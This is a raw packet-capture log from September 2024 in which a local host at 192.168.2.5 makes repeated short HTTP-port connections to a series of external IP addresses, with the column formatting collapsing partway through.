Sep 16, 2024 09:31:07.186446905 CEST  58664        80         192.168.2.5      203.161.43.228
Sep 16, 2024 09:31:07.191461086 CEST  80           58664      203.161.43.228   192.168.2.5
Sep 16, 2024 09:31:07.191550970 CEST  58664        80         192.168.2.5      203.161.43.228
Sep 16, 2024 09:31:07.203464985 CEST  58664        80         192.168.2.5      203.161.43.228
Sep 16, 2024 09:31:07.208527088 CEST  80           58664      203.161.43.228   192.168.2.5
Sep 16, 2024 09:31:07.208559990 CEST  80           58664      203.161.43.228   192.168.2.5
Sep 16, 2024 09:31:07.820034027 CEST  80           58664      203.161.43.228   192.168.2.5
Sep 16, 2024 09:31:07.820097923 CEST  80           58664      203.161.43.228   192.168.2.5
Sep 16, 2024 09:31:07.820214033 CEST  58664        80         192.168.2.5      203.161.43.228
Sep 16, 2024 09:31:08.713886976 CEST  58664        80         192.168.2.5      203.161.43.228
Sep 16, 2024 09:31:09.734755039 CEST  58665        80         192.168.2.5      203.161.43.228
Sep 16, 2024 09:31:09.739816904 CEST  80           58665      203.161.43.228   192.168.2.5
Sep 16, 2024 09:31:09.739897966 CEST  58665        80         192.168.2.5      203.161.43.228
Sep 16, 2024 09:31:09.747811079 CEST  58665        80         192.168.2.5      203.161.43.228
Sep 16, 2024 09:31:09.752712011 CEST  80           58665      203.161.43.228   192.168.2.5
Sep 16, 2024 09:31:10.330846071 CEST  80           58665      203.161.43.228   192.168.2.5
Sep 16, 2024 09:31:10.330889940 CEST  80           58665      203.161.43.228   192.168.2.5
Sep 16, 2024 09:31:10.331008911 CEST  58665        80         192.168.2.5      203.161.43.228
Sep 16, 2024 09:31:10.333911896 CEST  58665        80         192.168.2.5      203.161.43.228
Sep 16, 2024 09:31:10.338660002 CEST  80           58665      203.161.43.228   192.168.2.5
Sep 16, 2024 09:31:15.391330004 CEST  58666        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:15.396342039 CEST  80           58666      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:15.396411896 CEST  58666        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:15.410332918 CEST  58666        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:15.415416956 CEST  80           58666      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:16.021503925 CEST  80           58666      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:16.021528006 CEST  80           58666      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:16.021547079 CEST  80           58666      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:16.021641016 CEST  58666        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:16.916935921 CEST  58666        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:17.935511112 CEST  58667        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:17.940359116 CEST  80           58667      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:17.941371918 CEST  58667        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:17.953509092 CEST  58667        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:17.958776951 CEST  80           58667      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:18.573765993 CEST  80           58667      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:18.573797941 CEST  80           58667      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:18.573812962 CEST  80           58667      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:18.573883057 CEST  58667        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:18.573883057 CEST  58667        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:19.463804960 CEST  58667        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:20.481985092 CEST  58668        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:20.486876965 CEST  80           58668      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:20.487032890 CEST  58668        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:20.496243000 CEST  58668        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:20.501194954 CEST  80           58668      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:20.501207113 CEST  80           58668      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:21.090826988 CEST  80           58668      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:21.090842962 CEST  80           58668      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:21.090861082 CEST  80           58668      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:21.090929985 CEST  58668        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:22.010649920 CEST  58668        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:23.029548883 CEST  58669        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:23.035619020 CEST  80           58669      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:23.035726070 CEST  58669        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:23.043401957 CEST  58669        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:23.049473047 CEST  80           58669      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:23.649131060 CEST  80           58669      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:23.649144888 CEST  80           58669      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:23.649156094 CEST  80           58669      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:23.649162054 CEST  80           58669      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:23.649173021 CEST  80           58669      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:23.649305105 CEST  58669        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:23.653970957 CEST  58669        80         192.168.2.5      161.97.168.245
Sep 16, 2024 09:31:23.658720970 CEST  80           58669      161.97.168.245   192.168.2.5
Sep 16, 2024 09:31:28.951154947 CEST  58670        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:28.955984116 CEST  80           58670      172.96.191.39    192.168.2.5
Sep 16, 2024 09:31:28.956058979 CEST  58670        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:28.967771053 CEST  58670        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:28.972583055 CEST  80           58670      172.96.191.39    192.168.2.5
Sep 16, 2024 09:31:29.891184092 CEST  80           58670      172.96.191.39    192.168.2.5
Sep 16, 2024 09:31:29.891323090 CEST  80           58670      172.96.191.39    192.168.2.5
Sep 16, 2024 09:31:29.891813993 CEST  58670        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:30.481559038 CEST  58670        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:31.498399973 CEST  58671        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:32.293606043 CEST  80           58671      172.96.191.39    192.168.2.5
Sep 16, 2024 09:31:32.293718100 CEST  58671        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:32.303944111 CEST  58671        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:32.308830976 CEST  80           58671      172.96.191.39    192.168.2.5
Sep 16, 2024 09:31:33.234311104 CEST  80           58671      172.96.191.39    192.168.2.5
Sep 16, 2024 09:31:33.234409094 CEST  80           58671      172.96.191.39    192.168.2.5
Sep 16, 2024 09:31:33.234647036 CEST  58671        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:33.807759047 CEST  58671        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:34.826199055 CEST  58672        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:34.831088066 CEST  80           58672      172.96.191.39    192.168.2.5
Sep 16, 2024 09:31:34.831300974 CEST  58672        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:34.841780901 CEST  58672        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:34.847521067 CEST  80           58672      172.96.191.39    192.168.2.5
Sep 16, 2024 09:31:34.847532988 CEST  80           58672      172.96.191.39    192.168.2.5
Sep 16, 2024 09:31:35.787333965 CEST  80           58672      172.96.191.39    192.168.2.5
Sep 16, 2024 09:31:35.787415028 CEST  80           58672      172.96.191.39    192.168.2.5
Sep 16, 2024 09:31:35.787539005 CEST  58672        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:36.360097885 CEST  58672        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:37.373925924 CEST  58673        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:37.381010056 CEST  80           58673      172.96.191.39    192.168.2.5
Sep 16, 2024 09:31:37.381076097 CEST  58673        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:37.389144897 CEST  58673        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:37.394063950 CEST  80           58673      172.96.191.39    192.168.2.5
Sep 16, 2024 09:31:38.353701115 CEST  80           58673      172.96.191.39    192.168.2.5
Sep 16, 2024 09:31:38.353723049 CEST  80           58673      172.96.191.39    192.168.2.5
Sep 16, 2024 09:31:38.353890896 CEST  58673        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:38.357352972 CEST  58673        80         192.168.2.5      172.96.191.39
Sep 16, 2024 09:31:38.362102985 CEST  80           58673      172.96.191.39    192.168.2.5
Sep 16, 2024 09:31:43.396763086 CEST  58674        80         192.168.2.5      104.21.20.125
Sep 16, 2024 09:31:43.401674986 CEST  80           58674      104.21.20.125    192.168.2.5
Sep 16, 2024 09:31:43.402005911 CEST  58674        80         192.168.2.5      104.21.20.125
Sep 16, 2024 09:31:43.412455082 CEST  58674        80         192.168.2.5      104.21.20.125
Sep 16, 2024 09:31:43.417392015 CEST  80           58674      104.21.20.125    192.168.2.5
Sep 16, 2024 09:31:43.986692905 CEST  80           58674      104.21.20.125    192.168.2.5
Sep 16, 2024 09:31:43.986711979 CEST  80           58674      104.21.20.125    192.168.2.5
Sep 16, 2024 09:31:43.986757040 CEST  58674        80         192.168.2.5      104.21.20.125
Sep 16, 2024 09:31:43.987951040 CEST  80           58674      104.21.20.125    192.168.2.5
Sep 16, 2024 09:31:43.988002062 CEST  58674        80         192.168.2.5      104.21.20.125
Sep 16, 2024 09:31:44.917009115 CEST  58674        80         192.168.2.5      104.21.20.125
                              Sep 16, 2024 09:31:45.937690020 CEST5867580192.168.2.5104.21.20.125
                              Sep 16, 2024 09:31:45.942786932 CEST8058675104.21.20.125192.168.2.5
                              Sep 16, 2024 09:31:45.942893028 CEST5867580192.168.2.5104.21.20.125
                              Sep 16, 2024 09:31:45.957672119 CEST5867580192.168.2.5104.21.20.125
                              Sep 16, 2024 09:31:45.963041067 CEST8058675104.21.20.125192.168.2.5
                              Sep 16, 2024 09:31:46.544471979 CEST8058675104.21.20.125192.168.2.5
                              Sep 16, 2024 09:31:46.544578075 CEST8058675104.21.20.125192.168.2.5
                              Sep 16, 2024 09:31:46.544642925 CEST5867580192.168.2.5104.21.20.125
                              Sep 16, 2024 09:31:46.545450926 CEST8058675104.21.20.125192.168.2.5
                              Sep 16, 2024 09:31:46.545525074 CEST5867580192.168.2.5104.21.20.125
                              Sep 16, 2024 09:31:47.463851929 CEST5867580192.168.2.5104.21.20.125
                              Sep 16, 2024 09:31:48.482846975 CEST5867680192.168.2.5104.21.20.125
                              Sep 16, 2024 09:31:48.487746954 CEST8058676104.21.20.125192.168.2.5
                              Sep 16, 2024 09:31:48.487822056 CEST5867680192.168.2.5104.21.20.125
                              Sep 16, 2024 09:31:48.502749920 CEST5867680192.168.2.5104.21.20.125
                              Sep 16, 2024 09:31:48.508409023 CEST8058676104.21.20.125192.168.2.5
                              Sep 16, 2024 09:31:48.508574963 CEST8058676104.21.20.125192.168.2.5
                              Sep 16, 2024 09:31:49.109253883 CEST8058676104.21.20.125192.168.2.5
                              Sep 16, 2024 09:31:49.109277010 CEST8058676104.21.20.125192.168.2.5
                              Sep 16, 2024 09:31:49.109416008 CEST8058676104.21.20.125192.168.2.5
                              Sep 16, 2024 09:31:49.109462023 CEST5867680192.168.2.5104.21.20.125
                              Sep 16, 2024 09:31:49.109544992 CEST5867680192.168.2.5104.21.20.125
                              Sep 16, 2024 09:31:50.010723114 CEST5867680192.168.2.5104.21.20.125
                              Sep 16, 2024 09:31:51.029524088 CEST5867780192.168.2.5104.21.20.125
                              Sep 16, 2024 09:31:51.034454107 CEST8058677104.21.20.125192.168.2.5
                              Sep 16, 2024 09:31:51.037952900 CEST5867780192.168.2.5104.21.20.125
                              Sep 16, 2024 09:31:51.045483112 CEST5867780192.168.2.5104.21.20.125
                              Sep 16, 2024 09:31:51.052027941 CEST8058677104.21.20.125192.168.2.5
                              Sep 16, 2024 09:31:51.620973110 CEST8058677104.21.20.125192.168.2.5
                              Sep 16, 2024 09:31:51.620992899 CEST8058677104.21.20.125192.168.2.5
                              Sep 16, 2024 09:31:51.621007919 CEST8058677104.21.20.125192.168.2.5
                              Sep 16, 2024 09:31:51.621138096 CEST5867780192.168.2.5104.21.20.125
                              Sep 16, 2024 09:31:51.621138096 CEST5867780192.168.2.5104.21.20.125
                              Sep 16, 2024 09:31:51.625838041 CEST5867780192.168.2.5104.21.20.125
                              Sep 16, 2024 09:31:51.630660057 CEST8058677104.21.20.125192.168.2.5
                              Sep 16, 2024 09:31:58.997574091 CEST5490480192.168.2.543.242.202.169
                              Sep 16, 2024 09:31:59.003174067 CEST805490443.242.202.169192.168.2.5
                              Sep 16, 2024 09:31:59.007487059 CEST5490480192.168.2.543.242.202.169
                              Sep 16, 2024 09:31:59.019413948 CEST5490480192.168.2.543.242.202.169
                              Sep 16, 2024 09:31:59.024310112 CEST805490443.242.202.169192.168.2.5
                              Sep 16, 2024 09:31:59.876331091 CEST805490443.242.202.169192.168.2.5
                              Sep 16, 2024 09:31:59.876463890 CEST805490443.242.202.169192.168.2.5
                              Sep 16, 2024 09:31:59.879482031 CEST5490480192.168.2.543.242.202.169
                              Sep 16, 2024 09:32:00.526350021 CEST5490480192.168.2.543.242.202.169
                              Sep 16, 2024 09:32:01.547405005 CEST5490580192.168.2.543.242.202.169
                              Sep 16, 2024 09:32:01.552531004 CEST805490543.242.202.169192.168.2.5
                              Sep 16, 2024 09:32:01.555563927 CEST5490580192.168.2.543.242.202.169
                              Sep 16, 2024 09:32:01.567409039 CEST5490580192.168.2.543.242.202.169
                              Sep 16, 2024 09:32:01.572443008 CEST805490543.242.202.169192.168.2.5
                              Sep 16, 2024 09:32:02.425764084 CEST805490543.242.202.169192.168.2.5
                              Sep 16, 2024 09:32:02.425838947 CEST805490543.242.202.169192.168.2.5
                              Sep 16, 2024 09:32:02.425976038 CEST5490580192.168.2.543.242.202.169
                              Sep 16, 2024 09:32:03.077608109 CEST5490580192.168.2.543.242.202.169
                              Sep 16, 2024 09:32:04.092618942 CEST5490680192.168.2.543.242.202.169
                              Sep 16, 2024 09:32:04.097574949 CEST805490643.242.202.169192.168.2.5
                              Sep 16, 2024 09:32:04.097646952 CEST5490680192.168.2.543.242.202.169
                              Sep 16, 2024 09:32:04.110135078 CEST5490680192.168.2.543.242.202.169
                              Sep 16, 2024 09:32:04.115123034 CEST805490643.242.202.169192.168.2.5
                              Sep 16, 2024 09:32:04.115139008 CEST805490643.242.202.169192.168.2.5
                              Sep 16, 2024 09:32:04.962973118 CEST805490643.242.202.169192.168.2.5
                              Sep 16, 2024 09:32:04.963126898 CEST805490643.242.202.169192.168.2.5
                              Sep 16, 2024 09:32:04.963227034 CEST5490680192.168.2.543.242.202.169
                              Sep 16, 2024 09:32:05.620425940 CEST5490680192.168.2.543.242.202.169
                              Sep 16, 2024 09:32:06.661897898 CEST5490780192.168.2.543.242.202.169
                              Sep 16, 2024 09:32:06.667066097 CEST805490743.242.202.169192.168.2.5
                              Sep 16, 2024 09:32:06.667136908 CEST5490780192.168.2.543.242.202.169
                              Sep 16, 2024 09:32:06.704241991 CEST5490780192.168.2.543.242.202.169
                              Sep 16, 2024 09:32:06.709088087 CEST805490743.242.202.169192.168.2.5
                              Sep 16, 2024 09:32:07.548497915 CEST805490743.242.202.169192.168.2.5
                              Sep 16, 2024 09:32:07.548619032 CEST805490743.242.202.169192.168.2.5
                              Sep 16, 2024 09:32:07.548753023 CEST5490780192.168.2.543.242.202.169
                              Sep 16, 2024 09:32:07.551316977 CEST5490780192.168.2.543.242.202.169
                              Sep 16, 2024 09:32:07.556148052 CEST805490743.242.202.169192.168.2.5
                              Sep 16, 2024 09:32:20.719189882 CEST5490880192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:20.724072933 CEST8054908104.207.148.137192.168.2.5
                              Sep 16, 2024 09:32:20.724138975 CEST5490880192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:20.735991955 CEST5490880192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:20.740814924 CEST8054908104.207.148.137192.168.2.5
                              Sep 16, 2024 09:32:21.303719044 CEST8054908104.207.148.137192.168.2.5
                              Sep 16, 2024 09:32:21.303802967 CEST8054908104.207.148.137192.168.2.5
                              Sep 16, 2024 09:32:21.307552099 CEST5490880192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:22.245220900 CEST5490880192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:23.263648987 CEST5490980192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:23.272788048 CEST8054909104.207.148.137192.168.2.5
                              Sep 16, 2024 09:32:23.272887945 CEST5490980192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:23.282674074 CEST5490980192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:23.290122986 CEST8054909104.207.148.137192.168.2.5
                              Sep 16, 2024 09:32:23.858465910 CEST8054909104.207.148.137192.168.2.5
                              Sep 16, 2024 09:32:23.858520985 CEST8054909104.207.148.137192.168.2.5
                              Sep 16, 2024 09:32:23.859664917 CEST5490980192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:24.791999102 CEST5490980192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:25.811470032 CEST5491080192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:25.816541910 CEST8054910104.207.148.137192.168.2.5
                              Sep 16, 2024 09:32:25.819592953 CEST5491080192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:25.830563068 CEST5491080192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:25.835591078 CEST8054910104.207.148.137192.168.2.5
                              Sep 16, 2024 09:32:25.835639000 CEST8054910104.207.148.137192.168.2.5
                              Sep 16, 2024 09:32:26.424429893 CEST8054910104.207.148.137192.168.2.5
                              Sep 16, 2024 09:32:26.424510002 CEST8054910104.207.148.137192.168.2.5
                              Sep 16, 2024 09:32:26.424572945 CEST5491080192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:27.338962078 CEST5491080192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:28.357808113 CEST5491180192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:28.362911940 CEST8054911104.207.148.137192.168.2.5
                              Sep 16, 2024 09:32:28.362993002 CEST5491180192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:28.371253967 CEST5491180192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:28.376842976 CEST8054911104.207.148.137192.168.2.5
                              Sep 16, 2024 09:32:28.946494102 CEST8054911104.207.148.137192.168.2.5
                              Sep 16, 2024 09:32:28.946578026 CEST8054911104.207.148.137192.168.2.5
                              Sep 16, 2024 09:32:28.946660042 CEST5491180192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:28.949624062 CEST5491180192.168.2.5104.207.148.137
                              Sep 16, 2024 09:32:28.954461098 CEST8054911104.207.148.137192.168.2.5
                              Sep 16, 2024 09:32:34.029108047 CEST5491280192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:34.034024954 CEST8054912185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:34.034105062 CEST5491280192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:34.045397043 CEST5491280192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:34.050256014 CEST8054912185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:35.473238945 CEST8054912185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:35.473280907 CEST8054912185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:35.473316908 CEST8054912185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:35.473351002 CEST8054912185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:35.473387957 CEST8054912185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:35.473393917 CEST5491280192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:35.473421097 CEST8054912185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:35.473449945 CEST8054912185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:35.473486900 CEST8054912185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:35.473489046 CEST5491280192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:35.473520994 CEST5491280192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:35.473536968 CEST5491280192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:35.558106899 CEST5491280192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:36.581902981 CEST5491380192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:36.586810112 CEST8054913185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:36.586889029 CEST5491380192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:36.598674059 CEST5491380192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:36.603512049 CEST8054913185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:37.444453001 CEST8054913185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:37.444474936 CEST8054913185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:37.444488049 CEST8054913185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:37.444499969 CEST8054913185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:37.444515944 CEST8054913185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:37.444591045 CEST5491380192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:37.444591045 CEST5491380192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:38.104533911 CEST5491380192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:39.122961998 CEST5491480192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:39.127793074 CEST8054914185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:39.131808996 CEST5491480192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:39.143508911 CEST5491480192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:39.148397923 CEST8054914185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:39.148637056 CEST8054914185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:40.085836887 CEST8054914185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:40.085858107 CEST8054914185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:40.085870028 CEST8054914185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:40.085875988 CEST8054914185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:40.085884094 CEST8054914185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:40.085896015 CEST8054914185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:40.085930109 CEST5491480192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:40.085975885 CEST5491480192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:40.651695013 CEST5491480192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:41.669998884 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:41.674793959 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:41.674885035 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:41.683321953 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:41.688354015 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.501647949 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.501672029 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.501725912 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.501739025 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.501755953 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.501784086 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.501799107 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.501812935 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.501823902 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.501832962 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.501836061 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.501847982 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.501866102 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.501900911 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.508018017 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.508052111 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.508063078 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.508086920 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.557610989 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.593930006 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.593957901 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.593976021 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.593991041 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.594005108 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.594027996 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.594119072 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.594289064 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.594333887 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.594337940 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.594350100 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.594362020 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.594372034 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.594386101 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.594422102 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.594958067 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:42.595021009 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.598916054 CEST5491580192.168.2.5185.104.29.12
                              Sep 16, 2024 09:32:42.604908943 CEST8054915185.104.29.12192.168.2.5
                              Sep 16, 2024 09:32:47.703512907 CEST5491680192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:47.709597111 CEST805491665.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:47.711637974 CEST5491680192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:47.723521948 CEST5491680192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:47.731129885 CEST805491665.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:48.381959915 CEST805491665.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:48.382134914 CEST805491665.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:48.382184982 CEST5491680192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:49.229624987 CEST5491680192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:50.248459101 CEST5491780192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:50.253447056 CEST805491765.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:50.253535032 CEST5491780192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:50.265780926 CEST5491780192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:50.270580053 CEST805491765.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:50.929989100 CEST805491765.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:50.930059910 CEST805491765.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:50.930157900 CEST5491780192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:51.776413918 CEST5491780192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:52.796756029 CEST5491880192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:52.801618099 CEST805491865.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:52.801686049 CEST5491880192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:52.817351103 CEST5491880192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:52.822293043 CEST805491865.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:52.822390079 CEST805491865.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:53.462506056 CEST805491865.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:53.462795019 CEST805491865.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:53.469754934 CEST5491880192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:54.323303938 CEST5491880192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:55.345873117 CEST5491980192.168.2.565.21.196.90
                              Sep 16, 2024 09:32:55.353995085 CEST805491965.21.196.90192.168.2.5
                              Sep 16, 2024 09:32:55.357655048 CEST5491980192.168.2.565.21.196.90
